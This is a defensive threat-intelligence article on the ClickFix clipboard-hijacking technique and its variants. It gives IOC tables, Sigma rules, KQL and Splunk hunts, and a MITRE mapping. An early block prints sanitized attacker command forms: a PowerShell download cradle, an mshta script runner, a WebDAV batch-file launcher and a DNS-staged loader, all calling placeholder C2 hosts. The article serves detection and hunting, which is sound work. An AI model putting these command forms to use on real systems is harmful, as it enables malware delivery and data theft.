ClickFix IOCs: What Defenders Need to Hunt Right Now

ClickFix is not a single piece of malware. It is a delivery mechanism — a social engineering technique that hijacks the human impulse to follow on-screen instructions, weaponizes the Windows clipboard, and deposits malicious payloads without touching a file on disk until the victim does it themselves. Since its first documented observation in March 2024, it has been adopted by ransomware operators, state-sponsored groups from North Korea, Iran, and Russia, and commodity crimeware actors at scale. By mid-2025, it accounted for 47% of observed initial access methods according to Microsoft's 2025 Digital Defense Report — and ESET recorded a 517% surge in detections from late 2024 to mid-2025. This article compiles the concrete indicators of compromise defenders need to detect, hunt, and block it — including the variants that postdate most published guidance.

The term "ClickFix" first gained traction in security research around late 2023 and accelerated into mainstream threat intelligence reporting through 2024 and into 2026. Proofpoint researchers formally documented the technique in May 2024, describing it as a social engineering tactic that presents users with a fake error or CAPTCHA prompt and then instructs them to copy a PowerShell command — pre-loaded into the clipboard by malicious JavaScript — and paste it into a Run dialog or terminal. The name derives from the lure framing: the victim is told they need to "fix" something by clicking and following steps. Threat actors immediately recognized the value: by late 2024, ClickFix builders were being sold on dark web forums, allowing operators with no development skill to generate ready-made weaponized landing pages.

What makes ClickFix particularly corrosive to traditional defenses is that no file is written by the attacker. The attacker writes JavaScript into a webpage. The webpage writes a command into the Windows clipboard. The user types Win+R, pastes the command, and hits Enter. At that moment, the user — not the attacker — has executed the payload. Many endpoint detection and response platforms that watch for suspicious process creation from browser processes will miss this entirely, because the parent process is explorer.exe or cmd.exe, exactly as legitimate administrative activity looks. As Unit 42 researchers note, the technique abuses "procedural trust" — the victim follows instructions that resemble familiar IT troubleshooting steps, which is precisely why automation alone cannot stop it.

How ClickFix Works

The kill chain is compact and consistent across observed campaigns. A user lands on a compromised or attacker-controlled web page. The page renders a modal overlay — often styled to mimic Microsoft, Google Chrome, Cloudflare, DocuSign, or a document-sharing service — declaring that an error has occurred, that a browser extension is missing, that a CAPTCHA must be completed, or that a document cannot display without a "font fix." The modal instructs the user to press Win+R to open the Windows Run dialog, then to press Ctrl+V to paste, and then to hit Enter.

The JavaScript executing in the background has already written a PowerShell one-liner to the clipboard. When the user pastes and executes it, the command typically reaches out to an attacker-controlled domain to download a second-stage payload. In some variants, the full payload is Base64-encoded and embedded directly in the clipboard string, eliminating the need for a secondary network request at execution time. A refinement observed in 2025 embeds long blank space before the malicious command in the clipboard string — so the visible portion of the pasted text looks harmless, hiding the actual payload from casual inspection.

Observed clipboard payloads follow a small set of structural patterns. The classic form is a PowerShell.exe invocation with -ExecutionPolicy Bypass, -WindowStyle Hidden, and -EncodedCommand or an IEX (Invoke-Expression) calling a remote URL. Some campaigns use mshta.exe instead of PowerShell, particularly when lures are staged on pages imitating Windows Update or Office activation prompts. A minority of observed variants use wscript.exe or cscript.exe to execute a VBScript payload. A newer DNS-based staging variant — disclosed by Microsoft Threat Intelligence in February 2026 — routes the initial command through cmd.exe and performs a DNS lookup against a hard-coded external DNS server. The DNS response itself carries the second-stage payload, using DNS as a signaling channel rather than a web request, which helps the activity blend into normal network traffic.

# Representative ClickFix clipboard payload structures (sanitized)

# Classic PowerShell encoded form
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -NoProfile -EncodedCommand [Base64_blob]

# IEX download cradle form
powershell -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('hxxps://[C2_domain]/[path]')"

# mshta variant — observed in Lumma Stealer and AsyncRAT campaigns
mshta "javascript:a=new ActiveXObject('WScript.Shell');a.Run('powershell ...',0);close()"

# WebDAV net use variant — new March 2026, evades PowerShell-focused EDR rules
"cmd.exe" /c net use Z: https://[attacker_IP]/webdav /persistent:no && "Z:\update.cmd" & net use Z: /delete

# DNS-based staging variant — February 2026
cmd.exe /c nslookup -type=TXT [attacker_domain] [hardcoded_DNS_server] | findstr "Name:" | [execution_logic]

ClickFix Variants: FileFix, CrashFix, TerminalFix, WebDAV, JackFix, ConsentFix, and GlitchFix

By mid-2025 the original ClickFix pattern had spawned a family of variants sharing the same core mechanic — clipboard poisoning and social engineering — but differing in how they instruct the victim to execute the payload, where execution happens, and what evidence they leave behind. Defenders who built detections only around the explorer.exe → powershell.exe parent-child chain will miss several of these. Some variants leave no endpoint footprint at all.

Threat Actors Using ClickFix

By mid-2024, ClickFix had transitioned from a niche technique to what Proofpoint described as "a very popular social engineering technique used by multiple threat actors." The adoption curve has been steep and the actor list has grown to span criminal, espionage, and ransomware operators across at least four nation-state alignments.

IOC Categories and Examples

Indicators of compromise for ClickFix fall into several distinct categories. Because infrastructure rotates rapidly, network-based IOCs have a shorter useful life than behavioral IOCs. The highest-fidelity detection comes from process and command-line telemetry and registry artifacts, not from domain block lists.

Behavioral IOCs (Highest Fidelity)

The reliable ClickFix indicators are behavioral patterns at the process execution layer. These do not change when infrastructure rotates, and they persist across variants.

Indicator	Type	Notes
explorer.exe → powershell.exe with -EncodedCommand	Process	PowerShell launched from explorer.exe (Win+R Run dialog) with encoded payload — primary ClickFix execution signature
explorer.exe → mshta.exe with javascript: URI	Process	mshta used as a PowerShell bypass; seen in Lumma and AsyncRAT campaigns
-ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive	Cmdline	Consistent flag combination across ClickFix campaigns; rarely seen in legitimate admin use launched from Run dialog
IEX(New-Object Net.WebClient).DownloadString(	Cmdline	Classic download cradle; ClickFix frequently uses this or DownloadFile variant in the clipboard command
cmd.exe /c net use [letter]: https://[IP]/webdav	Cmdline	WebDAV net use variant — new as of March 2026; bypassed Defender for Endpoint in observed campaign. Followed immediately by batch file execution and drive deletion.
cmd.exe /c powershell [hidden flags] launched from explorer.exe	Process	Some variants wrap PowerShell in a cmd shell to add one layer of obfuscation
wscript.exe or cscript.exe with .vbs from %TEMP% or %APPDATA%	Process	VBScript variant; less common but observed in campaigns impersonating Office activation
finger.exe invoked with an external IP or domain argument	Process	CrashFix variant; finger.exe retrieves obfuscated PowerShell payload from attacker server without a standard HTTP request
Clipboard content containing powershell and -enc or -EncodedCommand at browser session time	Clipboard	Some EDR solutions can inspect clipboard contents; a PowerShell encoded command in clipboard during active browsing is a strong signal
nslookup with hardcoded non-system DNS server, output piped through findstr for execution	Cmdline	DNS-based staging variant identified by Microsoft in February 2026; uses DNS TXT records to deliver the second-stage payload
wt.exe (Windows Terminal) spawning powershell.exe with encoded or hex-encoded arguments	Process	TerminalFix / Win+X variant; bypasses detections anchored to explorer.exe as parent. No RunMRU artifact is written. Alert on wt.exe as parent for suspicious PowerShell activity.
SyncAppvPublishingServer.vbs executing PowerShell with encoded payload	Process	GlitchFix / Amatera Stealer campaigns (2026); abuses a signed Microsoft App-V script as a LOLBin proxy to conceal direct PowerShell invocation from standard detection rules

Registry Forensic IOCs — RunMRU and TypedPaths

A critical and underutilized detection surface for ClickFix is the Windows Run dialog history registry key. Every command executed through Win+R is written to HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. Hunting this key for PowerShell invocations, net use commands pointing to external IPs, or mshta with javascript: URIs provides a reliable forensic trail. Defenders should also alert on deletion of this key — mapped to T1070.003 — since COLDRIVER and other actors have been observed wiping it post-execution to cover their tracks.

For FileFix, the equivalent artifact is HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths, which records what the user typed into File Explorer's address bar. A PowerShell or web request command appearing in TypedPaths is highly anomalous and a strong indicator of FileFix execution.

Registry Key	Variant	Hunting Guidance
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU	ClickFix	Alert on entries containing: powershell, mshta, cmd, net use with external IPs, or any value with http:// or https:// strings
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths	FileFix	Alert on entries that are not filesystem paths — any PowerShell syntax or URL is anomalous in this key
reg.exe delete targeting RunMRU (T1070.003)	Cleanup	Deletion of RunMRU is a strong post-execution indicator; rarely done by legitimate processes. Attributed to COLDRIVER and other APT actors.

Network IOCs (Moderate Fidelity, Rotate Frequently)

Specific domains and IPs from ClickFix campaigns have limited shelf lives — infrastructure is typically stood up for a campaign and abandoned within days to weeks. The following patterns are drawn from published threat research; defenders should treat domain and IP IOCs as ephemeral and prioritize detection logic over block lists.

URL path patterns observed across ClickFix campaigns include short alphanumeric paths under /d/, /dl/, /s/, or /get/ prefixes, often serving PowerShell scripts with .ps1 extensions or extensionless responses with text/plain content type. Some campaigns used GitHub raw content URLs (raw.githubusercontent.com) to host the second-stage script, a technique that complicates domain-based blocking. A Rapid7-documented campaign active since December 2025 weaponized over 250 compromised WordPress sites across 12 countries as lure delivery infrastructure, including a U.S. Senate candidate's official webpage.

Pattern / Example	Type	Campaign Association
hxxps://raw.githubusercontent[.]com/[user]/[repo]/main/[script].ps1	URL	Lumma Stealer, AsyncRAT campaigns; GitHub as anonymous hosting
Newly registered .top, .xyz, .online, .site TLDs with captcha- or verify- prefixes	Domain Pattern	Broad ClickFix campaigns; fake CAPTCHA delivery
verify-human[.]pages[.]dev, check-browser[.]pages[.]dev (pattern)	Domain Pattern	Cloudflare Pages abuse for lure delivery; observed 2024
Domains registered via Namecheap or Porkbun with privacy protection, age <14 days	Domain Attr	Consistent across multiple campaigns; useful for proactive blocking of new infrastructure
HTTP GET to /[4-8 char random string].ps1 returning text/plain with IEX content	URL Pattern	Second-stage download; high-confidence ClickFix payload delivery
AS202425 (IP Volume Inc.), AS9370 (Sakura Internet) hosting C2	ASN	Commonly abused hosting ASNs in ClickFix infrastructure; useful for enrichment and risk scoring
mein-lonos-cloude[.]de (Storm-0426 campaign, March 2025)	Domain	Attacker-controlled site used in MintsLoader campaign targeting German users; delivered via Prometheus TDS
Outbound WebDAV connections (port 443/80) to residential or VPS IPs from cmd.exe or net.exe	Network	WebDAV net use variant; net use connections to external IPs are anomalous in most enterprise environments

Registry and Persistence IOCs

When ClickFix delivers a stealer like Lumma, persistence is often not established — the goal is data exfiltration in a single session. When it delivers a RAT, loader, or ransomware precursor, persistence mechanisms follow predictable patterns.

Indicator	Type	Associated Payload
HKCU\Software\Microsoft\Windows\CurrentVersion\Run — entries pointing to %APPDATA% executables	Registry	AsyncRAT, NetSupport RAT, ModeloRAT persistence
Scheduled task with name resembling system tasks (e.g., "MicrosoftUpdateHelper", "ChromeUpdater")	Scheduled Task	DarkGate, Matanbuchus, QuasarRAT (Kimsuky) persistence
Scheduled VBScript task set to run at 19-minute intervals	Scheduled Task	Kimsuky (TA427) ClickFix campaign — documented by Proofpoint, April 2025
%APPDATA%\[random 8-char string]\[random].exe — new PE in Roaming with no digital signature	File	General ClickFix payload drop location
%TEMP%\[random].vbs or [random].js executed on first run, then deleted	File	Intermediate dropper; often cleaned up after payload execution
LNK file in Startup folder pointing to PowerShell	File	Observed in some NetSupport RAT deployments via ClickFix
Portable WinPython environment in non-standard path (e.g., %APPDATA%\WinPython)	File	CrashFix / KongTuke variant delivering ModeloRAT
jli.dll loaded into java.exe from USOShared directory	File	LeakNet post-exploitation chain — DLL side-loading as noted by ReliaQuest, 2026

Detection Rules and Hunt Queries

The following detection logic is based on patterns documented across Proofpoint, Huntress, Unit 42, Atos, Microsoft Threat Intelligence, and Trend Micro research. These are starting points for tuning, not production-ready rules — they will generate noise in environments with active PowerShell-based administration. Baseline your environment before deploying them broadly.

Sigma Rule: ClickFix PowerShell Execution from Run Dialog

title: ClickFix PowerShell Execution via Windows Run Dialog
id: [assign your own GUID]
status: experimental
description: >
  Detects PowerShell launched from explorer.exe (Windows Run dialog)
  with flags commonly used in ClickFix clipboard-injected commands.
author: NoHackie
references:
  - https://www.proofpoint.com/us/blog/threat-insight/clipboard-hijacking-clickfix
  - https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith: '\explorer.exe'
    Image|endswith: '\powershell.exe'
    CommandLine|contains|all:
      - '-ExecutionPolicy'
      - 'Bypass'
      - '-WindowStyle'
      - 'Hidden'
  condition: selection
falsepositives:
  - Legitimate admin scripts launched manually via Run dialog
level: high
tags:
  - attack.execution
  - attack.t1059.001
  - attack.t1204.002

Sigma Rule: mshta with JavaScript URI from Explorer

title: ClickFix mshta JavaScript URI Execution
id: [assign your own GUID]
status: experimental
description: >
  Detects mshta.exe launched from explorer.exe with a javascript: URI,
  consistent with ClickFix variants that avoid direct PowerShell invocation.
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith: '\explorer.exe'
    Image|endswith: '\mshta.exe'
    CommandLine|contains: 'javascript:'
  condition: selection
falsepositives:
  - Rare; mshta with javascript URI from explorer has very limited legitimate use
level: high
tags:
  - attack.execution
  - attack.t1218.005

Sigma Rule: RunMRU Registry Contains Suspicious Command

title: ClickFix Execution Pattern via RunMRU Registry Write
id: [assign your own GUID]
status: experimental
description: >
  Detects writes to the RunMRU registry key containing indicators of 
  ClickFix-style command execution — URLs, PowerShell, mshta, net use, 
  or cmd invocations that are anomalous in the Run dialog context.
  Covers ClickFix and WebDAV net use variants.
references:
  - https://detection.fyi/sigmahq/sigma/windows/registry/registry_set/registry_set_potential_clickfix_execution/
  - https://atos.net/en/lp/cybershield
logsource:
  category: registry_set
  product: windows
detection:
  selection:
    TargetObject|contains: '\Explorer\RunMRU'
    Details|contains:
      - 'powershell'
      - 'mshta'
      - 'http://'
      - 'https://'
      - 'net use'
      - '-EncodedCommand'
      - 'IEX'
  condition: selection
falsepositives:
  - Extremely rare; these strings have no legitimate use in Run dialog history
level: high
tags:
  - attack.execution
  - attack.t1204.002

Sigma Rule: RunMRU Registry Deletion (Post-Execution Cleanup)

title: RunMRU Registry Key Deletion — ClickFix Anti-Forensics
id: [assign your own GUID]
status: experimental
description: >
  Detects deletion of the RunMRU registry key. Observed in COLDRIVER
  campaigns and other ClickFix actors performing post-execution cleanup
  to remove forensic evidence of Win+R command history.
references:
  - https://detection.fyi/sigmahq/sigma/windows/process_creation/proc_creation_win_reg_delete_runmru/
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    - Image|endswith: '\reg.exe'
    - OriginalFileName: 'reg.exe'
  selection_cli:
    CommandLine|contains|all:
      - ' del'
      - '\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
  condition: all of selection_*
falsepositives:
  - Unknown; this is a high-confidence indicator
level: high
tags:
  - attack.defense-evasion
  - attack.t1070.003

KQL Hunt Query (Microsoft Sentinel / Defender XDR)

// ClickFix: Multi-variant detection covering PowerShell, mshta, net use, and finger.exe
DeviceProcessEvents
| where InitiatingProcessFileName =~ "explorer.exe"
    or (InitiatingProcessFileName =~ "cmd.exe" and ProcessCommandLine has "net use" and ProcessCommandLine has "https://")
| where FileName in~ ("powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe", "finger.exe", "cmd.exe")
| where ProcessCommandLine has_any (
    "-ExecutionPolicy", "-EncodedCommand", "IEX(New-Object",
    "DownloadString", "javascript:", "net use", "-w hidden"
  )
| project Timestamp, DeviceName, AccountName, FileName,
          ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by Timestamp desc

// ClickFix: RunMRU registry artifact hunt
DeviceRegistryEvents
| where RegistryKey has "RunMRU"
| where RegistryValueData has_any (
    "powershell", "mshta", "http://", "https://", "net use", "-EncodedCommand", "IEX"
  )
| project Timestamp, DeviceName, AccountName, RegistryKey, RegistryValueName, RegistryValueData
| order by Timestamp desc

Splunk SPL Hunt Query

index=windows sourcetype=WinEventLog:Security OR sourcetype=sysmon
EventCode=4688 OR EventID=1
(ParentImage="*\\explorer.exe" OR (ParentImage="*\\cmd.exe" AND CommandLine="*net use*https*"))
(Image="*\\powershell.exe" OR Image="*\\mshta.exe" OR Image="*\\finger.exe" OR Image="*\\cmd.exe")
(CommandLine="*ExecutionPolicy*Bypass*" OR CommandLine="*EncodedCommand*"
 OR CommandLine="*IEX*DownloadString*" OR CommandLine="*net use*webdav*"
 OR CommandLine="*javascript:*")
| table _time, ComputerName, User, ParentImage, Image, CommandLine
| sort - _time

MITRE ATT&CK Mapping

ClickFix and its variants map across multiple MITRE ATT&CK techniques, which is part of what makes it effective — it is genuinely a multi-technique attack chain, not cleanly categorized into a single TTP. The variant landscape adds several mappings not present in 2024-era documentation, and ConsentFix introduces a technique — T1528 (Steal Application Access Token) — that requires identity-layer detection rather than endpoint telemetry.

Technique ID	Technique Name	ClickFix Application
T1204.002	User Execution: Malicious File	User pastes and executes the clipboard payload — execution requires user action and bypasses most automated defenses
T1204.001	User Execution: Malicious Link	User clicks a link or lure button that triggers clipboard write; MITRE community now maps ClickFix here as the primary entry point
T1059.001	Command and Scripting Interpreter: PowerShell	PowerShell is the primary interpreter used in clipboard payloads across all major campaigns
T1218.005	System Binary Proxy Execution: Mshta	mshta.exe variant used to proxy execution and bypass PowerShell-specific detections
T1105	Ingress Tool Transfer	PowerShell download cradle retrieves second-stage payload from attacker C2
T1027	Obfuscated Files or Information	Base64-encoded command blocks and ROT-cipher obfuscation hide payload content from casual inspection; blank-space padding hides payload from clipboard preview
T1566.002	Phishing: Spearphishing Link	Initial delivery via malicious link in email or messaging platform leading to lure page
T1608.004	Stage Capabilities: Drive-by Target	Attacker stages lure content on compromised or purpose-built websites
T1140	Deobfuscate/Decode Files or Information	PowerShell decodes Base64 payload at runtime before execution
T1021.002	Remote Services: SMB/Windows Admin Shares (via WebDAV)	WebDAV net use variant mounts a remote share to deliver and execute a batch file, then removes the mapping
T1071.004	Application Layer Protocol: DNS	DNS-based staging variant uses DNS TXT lookups against attacker-controlled resolvers to deliver second-stage payload
T1070.003	Indicator Removal: Clear Command History	Post-execution deletion of RunMRU registry key observed in COLDRIVER campaigns to remove forensic trace of Win+R execution
T1528	Steal Application Access Token	ConsentFix variant; victim is tricked into pasting a localhost OAuth authorization code URL into an attacker-controlled page, granting the attacker persistent access to the victim's Microsoft account via Azure CLI without any password or MFA interaction
T1071.001	Application Layer Protocol: Web Protocols (Blockchain C2)	EtherHiding technique observed in LeakNet and ClearFake-adjacent campaigns; next-stage payloads and C2 commands are retrieved via Binance BNB Smart Chain smart contracts, bypassing domain-based blocking and infrastructure takedowns

The T1204.002 / T1204.001 (User Execution) mapping is the most significant from a defensive standpoint. Because the user performs the final execution step, many automated defenses do not trigger. The attack is specifically designed to make the user the last line of defense — and to convince that user that what they are doing is legitimate and helpful. Proofpoint's April 2025 analysis of state-sponsored ClickFix adoption concluded that the technique is not fundamentally changing those actors' campaigns — it is being inserted into the installation and execution stages of infection chains that already existed, which means that detection at the execution layer is the only reliable chokepoint regardless of which threat actor is operating it.

Key Takeaways

1. Detect at execution, not at delivery: ClickFix bypasses email and file-based controls. Your detection must live in EDR telemetry — specifically in process creation events watching for PowerShell, mshta, cmd, or net use launched from explorer.exe with suspicious flag combinations. The RunMRU registry key is a complementary forensic surface that caught the March 2026 WebDAV variant when EDR missed it entirely.
2. Behavioral IOCs outlast network IOCs: Specific C2 domains and IPs rotate too fast to be operationally useful as your primary detection mechanism. The command-line patterns — -ExecutionPolicy Bypass, -WindowStyle Hidden, encoded commands, download cradles — and the RunMRU registry artifacts are consistent across campaigns and threat actors. Build detections on these patterns and hunt the registry, not just the process tree.
3. The variant list is growing and each variant has different forensic artifacts: Classic ClickFix leaves evidence in RunMRU and the explorer.exe process chain. FileFix leaves evidence in TypedPaths. TerminalFix leaves no RunMRU artifact at all. The WebDAV net use variant bypassed Defender for Endpoint in a confirmed 2026 incident. A single detection rule covering only the original pattern misses most of the current threat surface. Hunt across all three registry keys and all relevant parent process relationships.
4. The actor list spans criminal and nation-state operators: ClickFix started as a commodity crimeware technique and was adopted by Kimsuky, MuddyWater, APT28, UNK_RemoteRogue, and COLDRIVER within roughly a year. Any organization that would be targeted by espionage actors, ransomware operators, or information stealers is a viable ClickFix target. The Microsoft 2025 Digital Defense Report's figure of 47% of initial accesses coming from ClickFix makes this a category-one detection priority.
5. User awareness is a meaningful control — but the training needs to keep up with the variant list: Unlike many malware delivery techniques, ClickFix requires the user to actively follow multi-step instructions. Security awareness training that specifically addresses the "copy this command and paste it in Run" pattern can interrupt the chain where technical controls have gaps. But that training is now insufficient on its own. The Win+X shortcut to Windows Terminal bypasses awareness programs built entirely around Win+R — and Microsoft confirmed in March 2026 that attackers are using this variant specifically to sidestep user training that focuses on the Run dialog. ConsentFix bypasses endpoint-focused training entirely because there is no command to paste and no terminal to open — just a URL in a browser. Extend training to cover three distinct scenarios: (1) any website that prompts Win+R or Win+X and paste; (2) any prompt to open Terminal on macOS; (3) any site — including search results — that asks you to copy and paste a URL containing a login token or authorization code. Train users to treat Cloudflare's verification interface as the canonical phishing vector it has become. Extend that training to macOS users: the Matryoshka and AMOS variants deliver via the same psychological mechanism and now operate with fileless execution and API-gated C2.
6. Restrict the Run dialog, PowerShell, and WebDAV where operationally feasible: Application control policies, AppLocker or Windows Defender Application Control rules, and PowerShell Constrained Language Mode all reduce the effectiveness of ClickFix. Where these cannot be applied broadly, consider Group Policy to disable the Win+R Run dialog for non-administrative users. For the WebDAV variant, consider blocking outbound WebDAV connections to external IPs at the network perimeter. Block newly registered domains (under 30 days old) as a layered control — this directly targets the infrastructure pattern common across commodity ClickFix campaigns.

ClickFix demonstrates that the effective attack techniques are often the simplest architecturally. There is no novel exploit here, no zero-day, no sophisticated persistence mechanism in the initial stage. It is a social engineering script that gets a human being to do the one thing that automated defenses are specifically not watching for: type a command themselves. The technique has now been adopted across criminal ecosystems and nation-state operations on three continents, expanded to macOS, evolved into at least four named variants, and is being actively sold as a builder product on dark web forums. Detection requires telemetry at the execution layer, hunting logic anchored to behavioral patterns rather than known-bad hashes, registry artifact analysis, and a workforce trained to recognize what the prompt looks like across all its forms.